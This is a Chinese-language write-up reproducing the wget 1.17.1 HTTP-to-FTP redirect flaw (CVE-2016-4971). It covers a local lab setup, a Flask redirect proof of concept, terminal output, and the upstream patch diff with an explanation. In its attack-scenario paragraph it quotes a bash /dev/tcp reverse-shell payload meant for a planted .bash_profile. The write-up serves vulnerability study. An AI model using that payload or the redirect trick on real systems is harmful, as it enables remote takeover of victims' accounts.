wget 是一个从网络上自动下载文件的工具,支持通过 HTTP、HTTPS、FTP 三种最常见的 TCP/IP 协议。
漏洞发生在将 HTTP 服务重定向到 FTP 服务时,wget 会默认选择相信 HTTP 服务器,并且直接使用重定向的 FTP URL,而没有对其进行二次验证或对下载文件名进行适当的处理。如果攻击者提供了一个恶意的 URL,通过这种重定向可能达到任意文件的上传的问题,并且文件名和文件内容也是任意的。
推荐使用的环境 | 备注 | |
---|---|---|
操作系统 | Ubuntu 16.04 | 体系结构:64 位 |
漏洞软件 | wget | 版本号:1.17.1 |
所需软件 | vsftpd | 版本号:3.0.3 |
首先需要安装 ftp 服务器:
$ sudo apt-get install vsftpd
修改其配置文件 /etc/vsftpd.conf
,使匿名用户也可以访问:
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
然后我们需要一个 HTTP 服务,这里选择使用 Flask:
$ sudo pip install flask
创建两个文件 noharm.txt 和 harm.txt,假设前者是我们请求的正常文件,后者是重定位后的恶意文件,如下:
$ ls
harm.txt httpServer.py noharm.txt
$ cat noharm.txt
"hello world"
$ cat harm.txt
"you've been hacked"
$ sudo cp harm.txt /srv/ftp
$ sudo python httpServer.py
* Running on http://0.0.0.0:80/ (Press CTRL+C to quit)
httpServer.py
代码如下:
#!/usr/bin/env python
from flask import Flask, redirect
app = Flask(__name__)
@app.route("/noharm.txt")
def test():
return redirect("ftp://127.0.0.1/harm.txt")
if __name__ == "__main__":
app.run(host="0.0.0.0",port=80)
接下来在另一个 shell 里(记得切换到一个不一样的目录),执行下面的语句:
$ ls | grep harm
$ wget --version | head -n1
GNU Wget 1.17.1 built on linux-gnu.
$ wget 0.0.0.0/noharm.txt
--2018-01-29 15:30:35-- http://0.0.0.0/noharm.txt
Connecting to 0.0.0.0:80... connected.
HTTP request sent, awaiting response... 302 FOUND
Location: ftp://127.0.0.1/harm.txt [following]
--2018-01-29 15:30:35-- ftp://127.0.0.1/harm.txt
=> ‘noharm.txt’
Connecting to 127.0.0.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE harm.txt ... 21
==> PASV ... done. ==> RETR harm.txt ... done.
Length: 21 (unauthoritative)
noharm.txt 100%[==============================================>] 21 --.-KB/s in 0s
2018-01-29 15:30:35 (108 KB/s) - ‘noharm.txt’ saved [21]
$ ls | grep harm
noharm.txt
$ cat noharm.txt
"you've been hacked"
可以看到发生了重定向,虽然下载的文件内容是重定位后的文件的内容(harm.txt),但文件名依然是一开始请求的文件名(noharm.txt),完全没有问题。
这样看来,该系统上的 wget 虽然是 1.17.1,但估计已经打过补丁了。我们直接编译安装原始的版本:
$ sudo apt-get install libneon27-gnutls-dev
$ wget https://ftp.gnu.org/gnu/wget/wget-1.17.1.tar.gz
$ tar zxvf wget-1.17.1.tar.gz
$ cd wget-1.17.1
$ ./configure
$ make && sudo make install
发出请求:
$ wget 0.0.0.0/noharm.txt
--2018-01-29 16:32:15-- http://0.0.0.0/noharm.txt
Connecting to 0.0.0.0:80... connected.
HTTP request sent, awaiting response... 302 FOUND
Location: ftp://127.0.0.1/harm.txt [following]
--2018-01-29 16:32:15-- ftp://127.0.0.1/harm.txt
=> ‘harm.txt’
Connecting to 127.0.0.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE harm.txt ... 21
==> PASV ... done. ==> RETR harm.txt ... done.
Length: 21 (unauthoritative)
harm.txt 100%[==============================================>] 21 --.-KB/s in 0s
2018-01-29 16:32:15 (3.41 MB/s) - ‘harm.txt’ saved [21]
$ cat harm.txt
"you've been hacked"
Bingo!!!这一次 harm.txt 没有被修改成原始请求的文件名。
在参考资料中,展示了一种针对 .bash_profile 的攻击,我们知道在刚登录 Linux 时,.bash_profile 会被执行,用于设置一些环境变量。但如果该文件是一个恶意的文件,比如 bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9980 0>&1
这样的 payload,执行后就会返回一个 shell 给攻击者。
如果某个人在自己的 home 目录下执行了 wget 请求,并且该目录下没有 .bash_profile,那么利用该漏洞,攻击这就可以将恶意的 .bash_profile 保存到这个人的 home 下。下一次启动时,恶意代码被执行,获得 shell。
$ git diff e996e322ffd42aaa051602da182d03178d0f13e1 src/ftp.c | cat
commit e996e322ffd42aaa051602da182d03178d0f13e1
Author: Giuseppe Scrivano <gscrivan@redhat.com>
Date: Mon Jun 6 21:20:24 2016 +0200
ftp: understand --trust-server-names on a HTTP->FTP redirect
If not --trust-server-names is used, FTP will also get the destination
file name from the original url specified by the user instead of the
redirected url. Closes CVE-2016-4971.
* src/ftp.c (ftp_get_listing): Add argument original_url.
(getftp): Likewise.
(ftp_loop_internal): Likewise. Use original_url to generate the
file name if --trust-server-names is not provided.
(ftp_retrieve_glob): Likewise.
(ftp_loop): Likewise.
Signed-off-by: Giuseppe Scrivano <gscrivan@redhat.com>
diff --git a/src/ftp.c b/src/ftp.c
index cc90c3d..88a9777 100644
--- a/src/ftp.c
+++ b/src/ftp.c
@@ -236,7 +236,7 @@ print_length (wgint size, wgint start, bool authoritative)
logputs (LOG_VERBOSE, !authoritative ? _(" (unauthoritative)\n") : "\n");
}
-static uerr_t ftp_get_listing (struct url *, ccon *, struct fileinfo **);
+static uerr_t ftp_get_listing (struct url *, struct url *, ccon *, struct fileinfo **);
static uerr_t
get_ftp_greeting(int csock, ccon *con)
@@ -315,7 +315,8 @@ init_control_ssl_connection (int csock, struct url *u, bool *using_control_secur
and closes the control connection in case of error. If warc_tmp
is non-NULL, the downloaded data will be written there as well. */
static uerr_t
-getftp (struct url *u, wgint passed_expected_bytes, wgint *qtyread,
+getftp (struct url *u, struct url *original_url,
+ wgint passed_expected_bytes, wgint *qtyread,
wgint restval, ccon *con, int count, wgint *last_expected_bytes,
FILE *warc_tmp)
{
@@ -1188,7 +1189,7 @@ Error in server response, closing control connection.\n"));
{
bool exists = false;
struct fileinfo *f;
- uerr_t _res = ftp_get_listing (u, con, &f);
+ uerr_t _res = ftp_get_listing (u, original_url, con, &f);
/* Set the DO_RETR command flag again, because it gets unset when
calling ftp_get_listing() and would otherwise cause an assertion
failure earlier on when this function gets repeatedly called
@@ -1779,8 +1780,8 @@ exit_error:
This loop either gets commands from con, or (if ON_YOUR_OWN is
set), makes them up to retrieve the file given by the URL. */
static uerr_t
-ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_file,
- bool force_full_retrieve)
+ftp_loop_internal (struct url *u, struct url *original_url, struct fileinfo *f,
+ ccon *con, char **local_file, bool force_full_retrieve)
{
int count, orig_lp;
wgint restval, len = 0, qtyread = 0;
@@ -1805,7 +1806,7 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
{
/* URL-derived file. Consider "-O file" name. */
xfree (con->target);
- con->target = url_file_name (u, NULL);
+ con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);
if (!opt.output_document)
locf = con->target;
else
@@ -1923,8 +1924,8 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
/* If we are working on a WARC record, getftp should also write
to the warc_tmp file. */
- err = getftp (u, len, &qtyread, restval, con, count, &last_expected_bytes,
- warc_tmp);
+ err = getftp (u, original_url, len, &qtyread, restval, con, count,
+ &last_expected_bytes, warc_tmp);
if (con->csock == -1)
con->st &= ~DONE_CWD;
@@ -2092,7 +2093,8 @@ Removing file due to --delete-after in ftp_loop_internal():\n"));
/* Return the directory listing in a reusable format. The directory
is specifed in u->dir. */
static uerr_t
-ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
+ftp_get_listing (struct url *u, struct url *original_url, ccon *con,
+ struct fileinfo **f)
{
uerr_t err;
char *uf; /* url file name */
@@ -2113,7 +2115,7 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
con->target = xstrdup (lf);
xfree (lf);
- err = ftp_loop_internal (u, NULL, con, NULL, false);
+ err = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
lf = xstrdup (con->target);
xfree (con->target);
con->target = old_target;
@@ -2136,8 +2138,9 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
return err;
}
-static uerr_t ftp_retrieve_dirs (struct url *, struct fileinfo *, ccon *);
-static uerr_t ftp_retrieve_glob (struct url *, ccon *, int);
+static uerr_t ftp_retrieve_dirs (struct url *, struct url *,
+ struct fileinfo *, ccon *);
+static uerr_t ftp_retrieve_glob (struct url *, struct url *, ccon *, int);
static struct fileinfo *delelement (struct fileinfo *, struct fileinfo **);
static void freefileinfo (struct fileinfo *f);
@@ -2149,7 +2152,8 @@ static void freefileinfo (struct fileinfo *f);
If opt.recursive is set, after all files have been retrieved,
ftp_retrieve_dirs will be called to retrieve the directories. */
static uerr_t
-ftp_retrieve_list (struct url *u, struct fileinfo *f, ccon *con)
+ftp_retrieve_list (struct url *u, struct url *original_url,
+ struct fileinfo *f, ccon *con)
{
static int depth = 0;
uerr_t err;
@@ -2310,7 +2314,10 @@ Already have correct symlink %s -> %s\n\n"),
else /* opt.retr_symlinks */
{
if (dlthis)
- err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
+ {
+ err = ftp_loop_internal (u, original_url, f, con, NULL,
+ force_full_retrieve);
+ }
} /* opt.retr_symlinks */
break;
case FT_DIRECTORY:
@@ -2321,7 +2328,10 @@ Already have correct symlink %s -> %s\n\n"),
case FT_PLAINFILE:
/* Call the retrieve loop. */
if (dlthis)
- err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
+ {
+ err = ftp_loop_internal (u, original_url, f, con, NULL,
+ force_full_retrieve);
+ }
break;
case FT_UNKNOWN:
logprintf (LOG_NOTQUIET, _("%s: unknown/unsupported file type.\n"),
@@ -2386,7 +2396,7 @@ Already have correct symlink %s -> %s\n\n"),
/* We do not want to call ftp_retrieve_dirs here */
if (opt.recursive &&
!(opt.reclevel != INFINITE_RECURSION && depth >= opt.reclevel))
- err = ftp_retrieve_dirs (u, orig, con);
+ err = ftp_retrieve_dirs (u, original_url, orig, con);
else if (opt.recursive)
DEBUGP ((_("Will not retrieve dirs since depth is %d (max %d).\n"),
depth, opt.reclevel));
@@ -2399,7 +2409,8 @@ Already have correct symlink %s -> %s\n\n"),
ftp_retrieve_glob on each directory entry. The function knows
about excluded directories. */
static uerr_t
-ftp_retrieve_dirs (struct url *u, struct fileinfo *f, ccon *con)
+ftp_retrieve_dirs (struct url *u, struct url *original_url,
+ struct fileinfo *f, ccon *con)
{
char *container = NULL;
int container_size = 0;
@@ -2449,7 +2460,7 @@ Not descending to %s as it is excluded/not-included.\n"),
odir = xstrdup (u->dir); /* because url_set_dir will free
u->dir. */
url_set_dir (u, newdir);
- ftp_retrieve_glob (u, con, GLOB_GETALL);
+ ftp_retrieve_glob (u, original_url, con, GLOB_GETALL);
url_set_dir (u, odir);
xfree (odir);
@@ -2508,14 +2519,15 @@ is_invalid_entry (struct fileinfo *f)
GLOB_GLOBALL, use globbing; if it's GLOB_GETALL, download the whole
directory. */
static uerr_t
-ftp_retrieve_glob (struct url *u, ccon *con, int action)
+ftp_retrieve_glob (struct url *u, struct url *original_url,
+ ccon *con, int action)
{
struct fileinfo *f, *start;
uerr_t res;
con->cmd |= LEAVE_PENDING;
- res = ftp_get_listing (u, con, &start);
+ res = ftp_get_listing (u, original_url, con, &start);
if (res != RETROK)
return res;
/* First: weed out that do not conform the global rules given in
@@ -2611,7 +2623,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
if (start)
{
/* Just get everything. */
- res = ftp_retrieve_list (u, start, con);
+ res = ftp_retrieve_list (u, original_url, start, con);
}
else
{
@@ -2627,7 +2639,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
{
/* Let's try retrieving it anyway. */
con->st |= ON_YOUR_OWN;
- res = ftp_loop_internal (u, NULL, con, NULL, false);
+ res = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
return res;
}
@@ -2647,8 +2659,8 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
of URL. Inherently, its capabilities are limited on what can be
encoded into a URL. */
uerr_t
-ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
- bool recursive, bool glob)
+ftp_loop (struct url *u, struct url *original_url, char **local_file, int *dt,
+ struct url *proxy, bool recursive, bool glob)
{
ccon con; /* FTP connection */
uerr_t res;
@@ -2669,16 +2681,17 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
if (!*u->file && !recursive)
{
struct fileinfo *f;
- res = ftp_get_listing (u, &con, &f);
+ res = ftp_get_listing (u, original_url, &con, &f);
if (res == RETROK)
{
if (opt.htmlify && !opt.spider)
{
+ struct url *url_file = opt.trustservernames ? u : original_url;
char *filename = (opt.output_document
? xstrdup (opt.output_document)
: (con.target ? xstrdup (con.target)
- : url_file_name (u, NULL)));
+ : url_file_name (url_file, NULL)));
res = ftp_index (filename, u, f);
if (res == FTPOK && opt.verbose)
{
@@ -2723,11 +2736,13 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
/* ftp_retrieve_glob is a catch-all function that gets called
if we need globbing, time-stamping, recursion or preserve
permissions. Its third argument is just what we really need. */
- res = ftp_retrieve_glob (u, &con,
+ res = ftp_retrieve_glob (u, original_url, &con,
ispattern ? GLOB_GLOBALL : GLOB_GETONE);
}
else
- res = ftp_loop_internal (u, NULL, &con, local_file, false);
+ {
+ res = ftp_loop_internal (u, original_url, NULL, &con, local_file, false);
+ }
}
if (res == FTPOK)
res = RETROK;
通过查看补丁的内容,我们发现主要的修改有两处,一个是函数 ftp_loop_internal()
,增加了对是否使用了参数 --trust-server-names
及是否存在重定向进行了判断:
con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);
另一个是函数 ftp_loop()
,也是一样的:
struct url *url_file = opt.trustservernames ? u : original_url;
修改之后,如果没有使用参数 --trust-server-names
,则默认使用原始 URL 中的文件名替换重定向后 URL 中的文件名。问题就这样解决了。